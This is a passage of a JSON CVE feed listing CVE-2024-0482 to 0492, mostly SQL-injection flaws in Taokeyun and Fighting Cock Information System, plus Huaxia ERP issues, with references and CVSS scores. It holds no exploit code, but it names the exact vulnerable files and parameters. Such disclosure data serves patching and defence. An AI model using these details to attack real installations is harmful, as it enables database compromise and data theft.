"https://note.zhaoj.in/share/MuWxURhTIYTP", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250587", "name" : "https://vuldb.com/?ctiid.250587", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250587", "name" : "https://vuldb.com/?ctiid.250587", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250587", "name" : "https://vuldb.com/?id.250587", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250587", "name" : "https://vuldb.com/?id.250587", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jifeer:taokeyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0483", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://note.zhaoj.in/share/dm5VSyxmQIdl", "name" : "https://note.zhaoj.in/share/dm5VSyxmQIdl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://note.zhaoj.in/share/dm5VSyxmQIdl", "name" : "https://note.zhaoj.in/share/dm5VSyxmQIdl", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250588", "name" : "https://vuldb.com/?ctiid.250588", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250588", "name" : "https://vuldb.com/?ctiid.250588", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250588", "name" : "https://vuldb.com/?id.250588", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250588", "name" : "https://vuldb.com/?id.250588", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:jifeer:taokeyun:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T10:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0484", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL6.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250589", "name" : "https://vuldb.com/?ctiid.250589", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250589", "name" : "https://vuldb.com/?ctiid.250589", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250589", "name" : "https://vuldb.com/?id.250589", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250589", "name" : "https://vuldb.com/?id.250589", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/cve-2024-0484-exploiting-the-sqli-in-fighting-cock-information-system-10-for-fun-and-profit", "name" : "https://www.vicarius.io/vsociety/posts/cve-2024-0484-exploiting-the-sqli-in-fighting-cock-information-system-10-for-fun-and-profit", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in code-projects Fighting Cock Information System 1.0. This issue affects some unknown processing of the file admin/action/update_mother.php. The manipulation of the argument age_mother leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250589 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0485", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL7.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250590", "name" : "https://vuldb.com/?ctiid.250590", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250590", "name" : "https://vuldb.com/?ctiid.250590", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250590", "name" : "https://vuldb.com/?id.250590", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250590", "name" : "https://vuldb.com/?id.250590", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://www.vicarius.io/vsociety/posts/cve-2024-0485-yet-another-sqli-in-fighting-cock-information-system-10-exploited-for-fun-and-profit", "name" : "https://www.vicarius.io/vsociety/posts/cve-2024-0485-yet-another-sqli-in-fighting-cock-information-system-10-exploited-for-fun-and-profit", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in code-projects Fighting Cock Information System 1.0. Affected is an unknown function of the file admin/pages/tables/add_con.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-250590 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T11:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0486", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL1.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250591", "name" : "https://vuldb.com/?ctiid.250591", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250591", "name" : "https://vuldb.com/?ctiid.250591", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250591", "name" : "https://vuldb.com/?id.250591", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250591", "name" : "https://vuldb.com/?id.250591", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /admin/action/add_con.php. The manipulation of the argument chicken leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250591." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T12:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0487", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL2.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250592", "name" : "https://vuldb.com/?ctiid.250592", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250592", "name" : "https://vuldb.com/?ctiid.250592", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250592", "name" : "https://vuldb.com/?id.250592", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250592", "name" : "https://vuldb.com/?id.250592", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Fighting Cock Information System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /admin/action/delete-vaccine.php. The manipulation of the argument ref leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250592." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0488", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL4.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250593", "name" : "https://vuldb.com/?ctiid.250593", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250593", "name" : "https://vuldb.com/?ctiid.250593", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250593", "name" : "https://vuldb.com/?id.250593", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250593", "name" : "https://vuldb.com/?id.250593", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been classified as critical. This affects an unknown part of the file /admin/action/new-feed.php. The manipulation of the argument type_feed leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250593 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T13:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0489", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf", "name" : "https://github.com/yingqian1984/FirePunch/blob/main/Fighting%20Cock%20Information%20System/FIGHTING_COCK_INFORMATION_SYSTEM_SQL3.pdf", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250594", "name" : "https://vuldb.com/?ctiid.250594", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250594", "name" : "https://vuldb.com/?ctiid.250594", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250594", "name" : "https://vuldb.com/?id.250594", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250594", "name" : "https://vuldb.com/?id.250594", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in code-projects Fighting Cock Information System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/action/edit_chicken.php. The manipulation of the argument ref leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250594 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:code-projects:fighting_cock_information_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-13T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0490", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250595", "name" : "https://vuldb.com/?ctiid.250595", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250595", "name" : "https://vuldb.com/?ctiid.250595", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250595", "name" : "https://vuldb.com/?id.250595", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250595", "name" : "https://vuldb.com/?id.250595", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Huaxia ERP up to 3.1. It has been rated as problematic. This issue affects some unknown processing of the file /user/getAllList. The manipulation leads to information disclosure. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-250595." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:huaxiaerp:huaxia_erp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-13T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0491", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md", "name" : "https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access2.md", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://vuldb.com/?ctiid.250596", "name" : "https://vuldb.com/?ctiid.250596", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250596", "name" : "https://vuldb.com/?ctiid.250596", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250596", "name" : "https://vuldb.com/?id.250596", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250596", "name" : "https://vuldb.com/?id.250596", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability classified as problematic has been found in Huaxia ERP up to 3.1. Affected is an unknown function of the file src/main/java/com/jsh/erp/controller/UserController.java. The manipulation leads to weak password recovery. It is possible to launch the attack remotely. Upgrading to version 3.2 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250596." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:huaxiaerp:huaxia_erp:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-13T15:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0492", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx", "name" : "https://github.com/laoquanshi/BILLING-SOFTWARE-SQL-injection-vulnerability/blob/main/BILLING%20SOFTWARE%20sql.docx", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250597", "name" : "https://vuldb.com/?ctiid.250597", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250597", "name" : "https://vuldb.com/?ctiid.250597", "refsource" : "", 